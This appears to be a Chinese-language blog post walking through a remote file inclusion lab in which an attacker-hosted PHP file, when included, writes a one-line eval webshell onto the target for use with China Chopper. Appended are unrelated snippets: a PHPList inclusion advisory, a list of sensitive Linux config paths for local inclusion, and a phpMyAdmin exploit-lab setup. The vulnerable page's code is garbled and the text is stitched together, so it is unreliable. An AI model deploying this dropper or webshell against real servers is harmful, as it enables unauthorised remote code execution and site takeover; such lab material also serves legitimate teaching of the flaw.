基本實驗 遠端檔案包含

2021-07-04 02:47:59 字數 624 閱讀 7129

首先在自己的**(10.0.3.88)中建立乙個txt檔案(test.txt),內容為:

<?php

$payload = "<?php eval(\$_post['123']);?>";

$myfile = fopen("cforce.php", "w") or die("unable to open file!");

fwrite($myfile,$payload);

fclose($myfile);

?>

rfi.php是存在漏洞的網頁

<?php

if (isset($_get["file"]))

?>

在漏洞**的根目錄下,生成了乙個新的檔案

cforce.php

cforce.php

<?php eval($_post['123']);?>

這是乙個一句話木馬,可以通過中國菜刀去連線,獲得webshell。

實驗完畢,通過遠端檔案包含獲得乙個webshell

在這個漏洞環境下,只要檔案內容符合php語法規範,那麼任何副檔名都可以被php解析。

PHPList遠端檔案包含漏洞

影響版本 phplist 2.6.2 漏洞描述 phplist是一款由php編寫的時事通訊應用程式。phplist由於不充分過濾使用者提交的請求,遠端攻擊者可以利用這個漏洞包含遠端伺服器上的惡意php檔案,以web許可權執行。michiel dethmers secfoc kipu.co.uk se...

本地包含和遠端包含

本地包含 etc httpd conf httpd.conf etc rc.local 有時可以讀出來apache的路徑 usr local lib php.ini etc hosts.deny 定義禁止訪問本機的主機 etc bashrc bash shell 的系統全域性配置 etc group...

phpmyadmin 4 8 1 遠端檔案包含漏洞

phpmyadmin是一套開源的 基於web的mysql資料庫管理工具。其index.php中存在一處檔案包含邏輯,通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。git clone git cd vulhub phpmyadmin cve 2018 12613 docker compose up ...